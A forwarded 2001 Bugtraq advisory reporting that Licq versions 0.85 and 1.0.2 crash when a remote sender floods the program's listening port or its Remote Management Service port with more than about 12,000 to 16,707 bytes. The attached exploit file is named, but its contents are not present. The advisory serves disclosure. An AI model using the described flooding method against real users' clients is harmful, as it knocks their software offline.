
(fwd) Advisory: Licq DoS +exploit



[Just when you thought it was safe to ICQ from Linux this happens...
No exploits yet, but I'm sure there'll be some coming up soon.
There's no upgrade at the moment, so keep checking the Licq site --
Raju]

This is an RFC 1153 digest.
(1 message)
----------------------------------------------------------------------

Return-Path: <BUGTRAQ@xxxxxxxxxxxxxxxxx>
Approved-By: beng@xxxxxxxxxxxxxxxxx
Delivered-To: bugtraq@xxxxxxxxxxxxxxxxxxxxxxx
Message-ID:  <Pine.GSO.4.21.0102201604400.20187-200000@xxxxxxxxxxxxxxxxxx>
Reply-To: "Stanley G. Bubrouski" <stan@xxxxxxxxxxx>
From: "Stanley G. Bubrouski" <stan@xxxxxxxxxxx>
Sender: Bugtraq List <BUGTRAQ@xxxxxxxxxxxxxxxxx>
To: BUGTRAQ@xxxxxxxxxxxxxxxxx
Subject:      Advisory: Licq DoS +exploit
Date:         Tue, 20 Feb 2001 16:19:36 -0500

---559023410-851401618-982703976=:20187
Content-Type: TEXT/PLAIN; charset=US-ASCII

Author:   Stan Bubrouski (stan@xxxxxxxxxxx)
Date:   February 20, 2001
Package:  Licq
Versions affected:  v.85 and v1.0.2  and possibly previous or newer versions.
Severity:  Remote users can cause Licq to crash or lock up completely.

Problems:  While testing Licq back in December it became apparent to me that
Licq could be made to crash consistently if a certain amount of data is
sent to a port it is listening on.  Further testing showed that sending a
certain amount of data to the port the Remote Management Service (RMS)
plugin listens on would also cause Licq to crash or lock up.  The
amount of data needed to be sent to crash Licq may vary from system to
system.  On the Red Hat Linux 7.0 system I used, 16707 or more bytes sent
to the port Licq was listening on was enough to crash it.  Sending around
12000 or more characters to the RMS plugin port was enough to crash Licq
on my system as well.  I've attached a simple exploit to demonstrate the
DoS.  I haven't tested any versions newer than 1.0.2 but they should be
assumed vulnerable as well.

Copyright 2001 Stan Bubrouski

--
Stan Bubrouski                                       stan@xxxxxxxxxxx
316 Huntington Ave. Apt #676, Boston, MA 02115       (617) 377-7222


---559023410-851401618-982703976=:20187
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="licqkill.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.GSO.4.21.0102201619360.20187@xxxxxxxxxxxxxxxxxx>
Content-Description:
Content-Disposition: attachment; filename="licqkill.c"

---559023410-851401618-982703976=:20187--

------------------------------

End of this Digest
******************

-- 
Raju Mathur          raju@xxxxxxxxxxxxx           http://kandalaya.org/